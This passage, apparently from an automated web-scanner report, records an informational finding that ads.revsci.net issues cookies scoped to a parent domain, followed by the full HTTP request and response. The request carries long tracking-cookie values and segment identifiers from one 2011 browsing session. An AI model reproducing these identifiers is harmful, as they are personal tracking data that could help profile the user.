CfPpyCmgV2k9Qt7j6Js6JK6MskVDjiIDMnYuKQsY4q6bLCoRAsBi8YRLb2vsp+DkTbxAxw7Kcb1MxcEKLPiFdUaZNyd82f5D6P5NkPlgX3UMdI06BEaGrENf1JmHbNBk2ufUcX8pUyJmXffWSzlkg9ymXCL5tCgZtfRy2YMKTrIGns0mcy2+c3WlEvp4swz9IqfAnxzqOaXALRL+cOkk8KWfSwoY6KAhz8Ouop+isEbiu7SFeycr8jS92TZrraHl2fpCVUl5msDJTkH7ZBJh5Hszbc5+PELQbx9Ss7A7jrnxQ1ORHgubxzW+nV11HPQHJsCmG0W5+2mUxq6P6rb5oK0q7eUemBZSL77jFXzhpPhcosHvKoXS9rhHnLqTdWnUVZa1dAsan2Sn7wu4c8uYaC26Y7zF7FtA5a0VdHdbY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:37:47 GMT

GIF89a.............!.......,...........D..;

13.16. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_dq3p="MLsXrrEOpxpv55C28tahZ2a57v4BlC60cICOgIfdHU7g3IqOG/0TqX40neBrVzd037nb4MpJdU9J4M3n1B1eZID1W20+/yIRBatEH08GZdNmvSuX3t2rRXZQzLLDgqTMsw5VG48uUeoMHBtCDHO43j1F0h376DWK7wrh9HF5wt0G1j04lpuTBJpmu+MKhYe39rt6ERHRfan6oZFqW4jIdIeBfQV1DnfKeVgR1k3AusB9K7AS3X20oQ+kbUsb1G20iS8IC5AreamP2nJ9XACJGTHLVn5e0LSMwW1dRipoWcv6bZ0Md/Lt18gMd2LIFno9nwx4Aoc55eOyKOsiGd1DYiADtXH7yNZKbhiLeBhUNGSVscpPIVVjqm6STXhk1QYbQpm1bUp26NxOedCCK0OJ8yEIiYgHDihUvnxx8J1Ny+HEb8Tyl3PSoLnVQirLGs9MwIPEWGig20VtDBoA86xDpaJ/eMzOO6zvd0GOrb4opbwcJrKqsitiyr8/QAnLfnvDFjcyl4QlTMBbV9ZHh73+RGiQvxY+3xyx4fBm9jmhA6rnNZmI+SR2UaVCZ5nW9K7dFwlqvP3rcrxJN32ehqay6eVnZ2uoGtDr8jpdOWCVtP2i9VkLP3YvnCN9BV7TJ6+Kh09njZnyrQNCwIErSgHDd3gXwoFr7v4DL2zY8K5NlbkhRo8/f//okhQ/Egtf1331cnGiUIzZminlHY+7V1kybEdXXtQl4qFrCWJh5jGjuccdaG5+A76Drn0+9+JJlUnxCROOtVPoKaQB6HDwwmvRaRxQJi1aIY6xhViQaGiucjmPtYNCdgDfJlsMAwsNoIGv2v5AsTz4GfgLyzqjAKfYanuveFsMU8cmo5vM2TpdLil7GdbOZcnaJseqt0JLRR3WYo+NDaPUlfOb8srT2RubiU6ioPfDSrieTPVcE1YYtTiBtZAvI43I5p5SAVHJSUm+3QcNfvRFSgywlow3Wk+r2saD8FrK8HjhxcZ4XJbqs82NG+jTLLSc4Egr/N+EdtoIznjMio5yPU0WXpFw8P97rgdsKMoLfmO25SPIg7YPQFiy1Jnq3T8hxl2kbLevIAee6gzFGr4APCQx5HDKDvBdjvHtpBFyKy4HMYPT73fIlT77Wcd1/lilbhvocIAYyl0suECwcqRX3JJIWj5XRaf3i98dxDrTgzHUnUCGgkDOH31RtEN/85ZY8KhgqhDGDBEAtl32LQF9vosMQCkX42jJckOS+YQKJswk9U8z/hftsmoDss/h50f691A0qb54fk950d/Q58HcDUbWRkXAGeIsqyY4+zul4QRwFqmXbceUueLl1/iF/A9dWGsRBgMY2BckpnmctCBeAOtG6LMjtKIRs9SR4O3lltDeXd5E"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMV4y+jOBYULQEE166YFQ6DmFfDqOqv5R26co+k4LEEzVkoRrop8y5ZQYFpxPJjE5QxDQ+XEMEfjZitbQaI0OEcBlgm3HbVBapZBUj4gebsoESY1gQB4r5K9z/LbiN+Yckov9ICfghisfVIqvqy/On8Ei0lvf8hzbkmU4m+SI32a4ytiDf3yl/4bMAhB9O71/oNYrYPnNoN8e7HT/bQsHiapEXfW4FGP5SDBz/WMK8qt+HrvFkkILMltGi/KhPZvMYpSNMRCXer+0XoQe0vjN5e2yzsORfl/C2VuuSzoI1te3hcaQrtt1CpNqLOGy6Tduv90yVOuuyk6pvs7EySgEIm48o9iklXltCb9za/GnRk4zy39xByfOshbqnZZm8zU97WhojHzdzjrRSYuKYaNaY/fhOZ/2YOUfTaG9ZnfRJ0QaA0FGoTNaHFDsfz7e2qYlKU5tVSvnHLU9+PJZHgvtLWdTrly7qN6BkH8lUf73fnrVMvyBVqij6fKKFcjil2V+KxJNzFiqhmI49Guihwq0V+LbkkHdckgzgyfylLNbdI9B6/XUYOB4wTNHU1IHl+WxOrS0Aa0Ikbu1wE9zuu+mGK3XF5rLQ5FSoo3Gyw0ljuxKt3lEUylLa8b4kE2aFiz+mCXvyVAJw8ySz5ps0PE2yC0kCH91/GzXp89h7+7AAqeZchiZg/og9Bv4Hmw/jGVPDR1/zN3aH0zWSAEz2kKnnwIVSDClrIjB7xT/VhzNuxv63WFmrJ3ZJSPRuGRQVdggZWwCtkTwdnH8GRyXFnx9GkYS8TTen3H661spcy7DpahRVmp5lXdgxhnE33yfW4sQKHTAb3c5epjGaj6U0gUFED0E19Pn0xpixcyO8CGSy6hhBCeCLF1Dx+ls9t9DFI0NVEj8uX41XKLBjTpILO5zlE3W49qXKKM1Oor9IKD5xhfspnJnKs6c/+9PebY2bUA/jSBu+Ztpb9VQsKx0YxvKTzA6puaEQucj3RjMaIez7OtZGHjz3neEG0idQEYfpym6ypCSkvCvg8ONhccwq6prbTtPEPXdrJUYxshgKjywWk/peVnjMU/jBSkwu4EurjmHloS0+M+8Sl1WdeJWM+IioB3kwKUUbNJtOCjLH9ch1E4XCjXNtWME7WHRmRL8oA1NR1XqKUmjzBzgawSq59nlSoBBAiLcd8C3MrpOVX2tf/Ljyk7kzMFSIb/gaas31hfdOY0y6FHTCeFh5PtNJBFoagjoC9/N0dx5yZAnjocXexh+h3z7kcP7XHApMRxd1XYAOvCnwgnSHHag5xCgMt1QYgrKmmwesxNAcPluGEKvHibMmsKnsbmooKkRiFaGIscYNs0O3XvMfq2aCe4qa9NYgcUiT4bi7OVSsT1v8r7RmHK+9/BJrxt4QekRalP4p9fyj6EhHfJmyaaeMh7rHN8L45tnMVPk+rkW2c/ayzrWRzy7xPzvi6Nw9w7Kcb0sxcEKIPiVdUbZNyd82b5D6P2tkPlgX3UMdI06BUaGrEdT1JmHbOAk2OfUcX8hU1JmXffWSz1kg9zmXCL5tCgZlfRy0YD6TrIGns0lcy2+c3WlAvuIswT+0qfAnNjqOaXAHRL+cSkk8KWXSwoI6KAgzkOupp+isEbiubcFeysr4jS92TZroAY9PsaBjog3y7CYBr/55Fqy80O8h8UljjWeBVz2KDTZVMMmVwspszcpxbRogYGFVjL/+d7uMGcEYjL7HNTs70qLF5x3gdWdVLOCfamEiYNZj1Quri2A0MZVr0r1zcOTh3xI3Wza5LOBi5mI0Og8bsVGiCBxzJfEw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1009698-703456-621393-665981-1268392-317325-1198035-1049794-1238051-481602-185980-770484-757774-74560-1086373-1196055-1086372-1215295-1264419-593881-1236954-1086371-1086370-1086369-926097-1236953-1196051-1236950-1236951-1147048-107089-1096152-1049851-1063912-1166710-1063916-588118-1063911-1063910-1215322-1009546-715901-1023315-715883-725071-109108-75921-1081817-1006093-617983-86237-1006089-1009578-1049785-1191521-1201817-1086731-641525-1049788-124865-1284585-1086733-1077940-1044410-1093100-613349-1010298-397181-672502-1009462-397180-1044578-1010301-1041270-1020427-1093092-1093093-1049769-1049770-596293-576685-596292-1049772-596291-1044587 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://media.ft.com/h/subs.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4def57e5&0&&4dc8e6f8&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4k+huXIQJ/AtY6gquhpCIKGAuq5fRa4Xl2IwC9pU+w6+9L42y41oDVUZb5s2bNa8jabVhWkrYcW9POLzC7mHn5XD+5kcRm9Ej7OPPmzGczLoQGAD4+mlCyw1VhRVLxG4hQ+WCi21gUr1ZTPL+gruAevoha7OGS623K8xyA07dj6zPJv+H/0n6817hXlqwQfDZkcIZI4MygcHJgoh426dFtLca2rjxg53k26V+5cxXgxVhg5Mb891U80/TjH9HHMhjrO61YWNi0gSNWS8WB/dbuAPnYyU+uFxoQIEv39QJMZYNbCJnUEVadipzIbXmIHFV8qNgwTXBP1iNqAqAjjHp338NIdd66GdSn48uSpCARemp8gQV3SRH4BGjpiBvpEd6arJtCCrS0Q18zylDuA74Y/tjQsUgCkiPmWxMMHriAR57SkGjQB6IRofvnzP2o6PFvv3ncBd4f/VtJaldXotvOVDnXOBcDqggJOR4z4zmZZ1E4kq6aYkMl1T3NJwVCCedTPtTvf01xbZ6WsvT5EFH9XRpLThbdUwXrhbAZ7XduchtE3zmWdITSVJKxKuUfiVDExBuSoAwxpaJj8l0B3MbY5gNyWjzjVSpveP9Qo7M4FeavFhqutbd8wrzm42JWbjOsRVvSL7bD7Vqmp+5iMziT2So9Cvzzn9voLENSuDHm090ZTdD7JK7Yd2leZkDlAaU1xWaFdQoXw5QJyBEGVY74DjT0GR5x/xL9797vXdoq6K3Q6K4+J2xBotqJtffqJViL1GA7Sb0GD5D37eSWaX3J6vfWA=; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rtc_qHsP=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; rsiPus_av67="MLsXrrEOpxpv55DW8tahZ2a57v6B9McZgL6ClJPbnj9y6INXr1ST6VLylaFsMiOIFsKHpjjz7J2U74uKff8LZ0fiJghVv1hoPrkGxNizCe1+Sw/ItTeB8U/PkG/H+26I+WKPXaq0lZZUrIvjuJkMVxzKMEJHlsi2vxU+ehpLMPuPnTeZHJi89Ju1xZbF1DzabOP/5pJywWJx/iuAc9CMjfxnTIjbfN2YuDt2nhuVDo+7I/Vj/S/LScCLLHs9m8timIWkRIWcK8Jq+JxLNoQhCyRQnDVDmIOWtWa7HKVruErxai/7TH2dkBdnDpiLanHqfhNlytJwZbu+piWcNACT47A4z1eF/98RRVCNNXWhijBBgYYlDJKn2N7sptwmdJGKECzgw6jZ9F9PMscPYERn+WOcWSgyEcikU3VT6i4iuPrcfh2Qx+Pzt/mldi7tmHUYnHcqOtazBZLGp1p5tvDT9PXrPAgnqUNqQmCpgxZ5XQnSS5Kk4DajqlYSazFxqGzPFrcFh+buPOCXa9ju4FpVeFFcvlHf9ZFrcncShGufVrpcwNbTcKkfWugkukUwdJ4dkw2viQV+c5xD2zeugeZ1a6DO5WyKCHZl3lALZETDTy7ei7VXZw0oK3xz2KVlTNMlMcmyKmLQPggv4J706OGVKhx7g3oDOpBxT2xYfXJaDV/KNewgZyu8hfGffX4u/82ggYboK3n39y1r9kcUC5GSQUZXW8DMoA5/22lgJYs6UN3ANqPg0xxusQXkbjlTpTr9s24VDMNwE5dP1n7wplNrWksQCKNywD89zOE13cfhkut499XoeOsYuxizk7yt3Gdljgd53554NpxNN7rAoRA878tKz2lvlTHwN+8kbjxbwW7NcqRELZT0wwWbHUxcj6ZFnwudCsGjviJ9T9WScjWQgFy5xQgV5TTmDiv2/ia+omRmWNXlC6Og8kE4iNir9fZXA6naBpm59zmL2CcOiQomHoX4EguT989c0WBpsxPlRZyQgYaIt7yMLh/PtqUb1di+HGBLK1+gVRi1myd4eCpyxMpLrO7YcLvqYZIezPXSDHg5SCCz/BP75L0yoRU5Z3kP9oY1r7XUJ82L1TUW/cLjlB2gXbHS87lfsq0zOcD2Z1xJpaj7BIr52r7gzM60ZhZJfVtG11jnBgOtxw6zqj5OX3rTQ4aslPAzz5UUpnP2DFIzSGF7VtMB8+0mf4AtwifFCCgi8VovAzTLbmSlKUjYFxcJKzbnBgYYmRgNjp0g4L6hwomKBsGzgxpkeVxykQgquP5MRtgvha+eORBz3AxraEcVHaPj4kvoLv8I3cFftcrtk5GkKi1GgyJTpfFB/BQZfiPKD+w+gjUnr42aIEs44Uo="; rsi_us_1000000="pUMV4y+jOBYULQEEu6zYIA6DmFfDqOqv5R26co+k4LFAgBjGPtyuxZXw308lcxsUwunMpsUsWNxVnHPKhyuK0OMcBlgm3HLVc4NN303pzfdAGddD+hUPOdfDCEClspoqFcZWTZXsi9L5bZyVzlLv0RUg31RNeF2vqZJINguJJ1RYp2mfhp0q6dtIu4Y3SrThi5hnZhV9ROBbalVO3CDjaO9NTZqisOIUKZKchz7WMaN12A48d1IkILOlSc283ekKwSFBjSYYUpnu3z/c4epMuHHdqPeC94kNlt0dvrFXqVrNgjP2twnyJqiVCqb1WWoSX4V7zHXbeDwU8JssiM6Ih2Il44QlFjXxzVM1aW+XziM1vF4G4Z8mL6ErLZgxoy9U2iBpR3KsUiapqvpNYLK1G7FkXhOAJdDO+bhRIFUY/43UJk84tw75hDusy+cN72kILQi5JJ1odnz+k6aHpb5jt8w947WxQkP5Nhe3hI1H029EWeMX25wJLCY4d5cdJ+Xe0l1bPcpmrqBhZRYBvyBtGu1z9ttNfaqwAx2XyxcBJUOByyZd9+HmNKDP8yXLudjhoPB0gSmBsZyug6eRDYbpuv0pV1vxJbEeJjvXEDwdVN9cfP82wIrnT2VxZ7LeN9vQJ2WbjkwyFj/0+Jb0rC1YdvetXhAVaXsTOk7L1XGbqEzCFm7HyBkAj62W1F87pmW66sCifAM8Ca9LrKtIeJ4XnHocalBiFrxEbokVk3z6mFvHyJ8YTNLAt7HoaukOPv7+8IKjgOSQsmmi6ST04yju18pWUmakQ3+OTicE1OViu/la0V/uFZYsaVY9d3O62gi8rABj/SZ/CATsmz27mTCSuDjbUwyJQphDA/+8gml7VSMOz1UGxuAP0mGAFTZoKYCuCAUAFfZz8mNl6+eymUFqob6Oo3X2kYtyrfeQ2C6oRp479gnzKcgk1ILvVwvwdqUNrOSqUsRvfAkf04+gTpjwb1IdXL2hngdfDMIutifO38eC2BAhT3htDpBQtxRF54p0UmSIwMYxt+2vFAbcMeV+XG+uJMW9K/OLsf6ZvDb1yJhdnkAAp/WQKQ5HvoHPlZBgBaDaZh4bQknC0g/Um215TnqEU4isFkZoP3BTg6FJR1VB07888tFgzCMztQTFWOuhNdp1MrqUGD3h1oa7SJ496tEUi6qnvcjYfr8/F28nWJ5Lc6ZqL6lTOoR0bU2ooKRkL+pH/wyFvEZiXZVslK3VdQ9Eqt4X4lvIk2zKENCIMAKVwRJ1qvNX/Pu7A8TfxZ6tniZXfjlx1c3cbb3ZaHAPCo9gt39XAb+/OZ/enC+iq8Tcff0btTgkphEDc5zpW2w169+qdm/miUk1QXWOzIt+zp4+/vOo48wK89TKNrYQvRfhumIKLiFWcOqKeKPBp0yV4Cg9u9iHOrieaQ57zNUs4lwRHva0gRmFFvIXZ2EaMNEd3Qf7Ty0YqPUs9qmotBZ9XLOJnJRlrBLnf0dbscOtBraszVGyvfF26Tw+IhXZdoxHiJNf3M8B8+rMDsVyjXOd3UHDvexfuBiYM7M9qc0dx3qDXFQbmN0RsdW7YACXNubcS0xN29R6iVUgvblj15GWreZkU+nT4LSWBYeKRYJhab0XSxelfMvyeU3Frbqd3MqOrIjtyndflWndgHoqkz2HOlg1Nqg51Bp/AqzhBybyxoI4pYCNWwam5ubEF087FG01d8fbPYceJydSAcm2naQ7U8SIdMyZBaUj7/ld3xRtjiWyUxCCRhumWbJHmVMx1m3I34tq6Cirv3k="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_av67=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_av67=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dq3p="MLsXrrEOpxpv55C28tahZ2a57v4BlC60cICOgIfdHU7g3IqOG/0TqX40neBrVzd037nb4MpJdU9J4M3n1B1eZID1W20+/yIRBatEH08GZdNmvSuX3t2rRXZQzLLDgqTMsw5VG48uUeoMHBtCDHO43j1F0h376DWK7wrh9HF5wt0G1j04lpuTBJpmu+MKhYe39rt6ERHRfan6oZFqW4jIdIeBfQV1DnfKeVgR1k3AusB9K7AS3X20oQ+kbUsb1G20iS8IC5AreamP2nJ9XACJGTHLVn5e0LSMwW1dRipoWcv6bZ0Md/Lt18gMd2LIFno9nwx4Aoc55eOyKOsiGd1DYiADtXH7yNZKbhiLeBhUNGSVscpPIVVjqm6STXhk1QYbQpm1bUp26NxOedCCK0OJ8yEIiYgHDihUvnxx8J1Ny+HEb8Tyl3PSoLnVQirLGs9MwIPEWGig20VtDBoA86xDpaJ/eMzOO6zvd0GOrb4opbwcJrKqsitiyr8/QAnLfnvDFjcyl4QlTMBbV9ZHh73+RGiQvxY+3xyx4fBm9jmhA6rnNZmI+SR2UaVCZ5nW9K7dFwlqvP3rcrxJN32ehqay6eVnZ2uoGtDr8jpdOWCVtP2i9VkLP3YvnCN9BV7TJ6+Kh09njZnyrQNCwIErSgHDd3gXwoFr7v4DL2zY8K5NlbkhRo8/f//okhQ/Egtf1331cnGiUIzZminlHY+7V1kybEdXXtQl4qFrCWJh5jGjuccdaG5+A76Drn0+9+JJlUnxCROOtVPoKaQB6HDwwmvRaRxQJi1aIY6xhViQaGiucjmPtYNCdgDfJlsMAwsNoIGv2v5AsTz4GfgLyzqjAKfYanuveFsMU8cmo5vM2TpdLil7GdbOZcnaJseqt0JLRR3WYo+NDaPUlfOb8srT2RubiU6ioPfDSrieTPVcE1YYtTiBtZAvI43I5p5SAVHJSUm+3QcNfvRFSgywlow3Wk+r2saD8FrK8HjhxcZ4XJbqs82NG+jTLLSc4Egr/N+EdtoIznjMio5yPU0WXpFw8P97rgdsKMoLfmO25SPIg7YPQFiy1Jnq3T8hxl2kbLevIAee6gzFGr4APCQx5HDKDvBdjvHtpBFyKy4HMYPT73fIlT77Wcd1/lilbhvocIAYyl0suECwcqRX3JJIWj5XRaf3i98dxDrTgzHUnUCGgkDOH31RtEN/85ZY8KhgqhDGDBEAtl32LQF9vosMQCkX42jJckOS+YQKJswk9U8z/hftsmoDss/h50f691A0qb54fk950d/Q58HcDUbWRkXAGeIsqyY4+zul4QRwFqmXbceUueLl1/iF/A9dWGsRBgMY2BckpnmctCBeAOtG6LMjtKIRs9SR4O3lltDeXd5E"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
